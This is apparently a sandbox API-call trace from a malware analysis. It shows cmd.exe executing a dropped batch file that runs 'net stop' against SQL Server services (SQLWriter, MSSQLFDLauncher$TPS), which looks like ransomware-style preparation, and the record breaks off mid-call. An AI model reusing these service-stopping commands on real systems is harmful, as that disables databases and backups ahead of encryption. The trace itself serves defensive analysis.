dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLWriter /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x888, dwThreadId=0x880)) returned 1 [0045.655] CloseHandle (hObject=0x74) returned 1 [0045.655] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.655] GetProcessHeap () returned 0x3e0000 [0045.655] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.655] GetEnvironmentStringsW () returned 0x3f8408* [0045.655] GetProcessHeap () returned 0x3e0000 [0045.655] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.655] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.655] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0045.949] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0045.976] CloseHandle (hObject=0x78) returned 1 [0045.976] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0045.976] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0045.976] GetProcessHeap () returned 0x3e0000 [0045.976] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.976] GetEnvironmentStringsW () returned 0x3f8408* [0045.976] GetProcessHeap () returned 0x3e0000 [0045.976] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.976] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.976] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.976] GetProcessHeap () returned 0x3e0000 [0045.976] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.977] GetEnvironmentStringsW () returned 0x3f8408* [0045.977] GetProcessHeap () returned 0x3e0000 [0045.977] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.977] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.977] GetProcessHeap () returned 0x3e0000 [0045.977] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0045.977] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0045.977] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.977] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0045.977] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.977] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0045.977] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.977] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0045.977] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.977] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0045.978] SetConsoleInputExeNameW () returned 0x1 [0045.978] GetConsoleOutputCP () returned 0x1b5 [0045.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0045.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0045.978] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0045.978] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.978] SetFilePointer (in: hFile=0x78, lDistanceToMove=1947, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x79b [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0045.978] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0045.979] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.979] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x79b [0045.979] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1126, lpOverlapped=0x0) returned 1 [0045.979] SetFilePointer (in: hFile=0x78, lDistanceToMove=1980, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7bc [0045.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$TPS /y\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 33 [0045.979] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.979] GetFileType (hFile=0x78) returned 0x1 [0045.979] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.979] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7bc [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0045.979] GetProcessHeap () returned 0x3e0000 [0045.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0045.980] _tell (_FileHandle=3) returned 1980 [0045.980] _close (_FileHandle=3) returned 0 [0045.980] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0045.980] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0045.980] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0045.980] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0045.980] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0045.980] _wcsicmp (_String1="net", _String2="CD") returned 11 [0045.980] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0045.980] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0045.980] _wcsicmp (_String1="net", _String2="REN") returned -4 [0045.980] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0045.980] _wcsicmp (_String1="net", _String2="SET") returned -5 [0045.980] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0045.980] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0045.980] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0045.980] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0045.980] _wcsicmp (_String1="net", _String2="MD") returned 1 [0045.980] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0045.980] _wcsicmp (_String1="net", _String2="RD") returned -4 [0045.980] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0045.980] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0045.980] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0045.980] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0045.981] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0045.981] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0045.981] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0045.981] _wcsicmp (_String1="net", _String2="VER") returned -8 [0045.981] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0045.981] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0045.981] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0045.981] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0045.981] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0045.981] _wcsicmp (_String1="net", _String2="START") returned -5 [0045.981] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0045.981] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0045.981] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0045.981] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0045.981] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0045.981] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0045.981] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0045.981] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0045.981] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0045.981] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0045.981] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0045.981] SetErrorMode (uMode=0x0) returned 0x1 [0045.981] GetProcessHeap () returned 0x3e0000 [0045.981] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0045.981] GetProcessHeap () returned 0x3e0000 [0045.981] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0045.981] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.981] GetProcessHeap () returned 0x3e0000 [0045.981] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0045.981] GetProcessHeap () returned 0x3e0000 [0045.981] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0045.981] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0045.981] GetProcessHeap () returned 0x3e0000 [0045.982] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0045.982] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.982] GetProcessHeap () returned 0x3e0000 [0045.982] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0045.982] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0045.982] GetProcessHeap () returned 0x3e0000 [0045.982] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0045.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.982] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.982] GetLastError () returned 0x2 [0045.982] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.982] GetLastError () returned 0x2 [0045.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.982] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.982] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.982] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.982] GetLastError () returned 0x2 [0045.983] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.983] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.983] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.983] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0045.983] SetErrorMode (uMode=0x0) returned 0x1 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0045.983] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0045.983] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0045.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0045.983] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0045.983] GetProcessHeap () returned 0x3e0000 [0045.983] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0045.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.984] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.984] GetLastError () returned 0x2 [0045.984] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.984] GetLastError () returned 0x2 [0045.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.984] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0045.984] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0045.984] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.984] GetLastError () returned 0x2 [0045.984] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0045.984] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0045.985] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.985] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0045.985] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0045.985] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0045.985] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.985] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$TPS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$TPS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x828, dwThreadId=0x3d0)) returned 1 [0045.988] CloseHandle (hObject=0x78) returned 1 [0045.989] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.989] GetProcessHeap () returned 0x3e0000 [0045.989] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.989] GetEnvironmentStringsW () returned 0x3f8408* [0045.989] GetProcessHeap () returned 0x3e0000 [0045.989] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.989] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.989] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0046.263] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0046.264] CloseHandle (hObject=0x74) returned 1 [0046.264] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0046.264] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0046.264] GetProcessHeap () returned 0x3e0000 [0046.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.264] GetEnvironmentStringsW () returned 0x3f8408* [0046.264] GetProcessHeap () returned 0x3e0000 [0046.264] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.264] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.264] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0046.264] GetProcessHeap () returned 0x3e0000 [0046.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.264] GetEnvironmentStringsW () returned 0x3f8408* [0046.264] GetProcessHeap () returned 0x3e0000 [0046.264] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.264] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.264] GetProcessHeap () returned 0x3e0000 [0046.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0046.264] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0046.264] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.264] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0046.265] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.265] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0046.265] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.265] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0046.265] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.265] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0046.265] SetConsoleInputExeNameW () returned 0x1 [0046.265] GetConsoleOutputCP () returned 0x1b5 [0046.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0046.265] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0046.266] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0046.266] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.266] SetFilePointer (in: hFile=0x74, lDistanceToMove=1980, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7bc [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0046.266] GetProcessHeap () returned 0x3e0000 [0046.266] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0046.267] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.267] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7bc [0046.267] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, 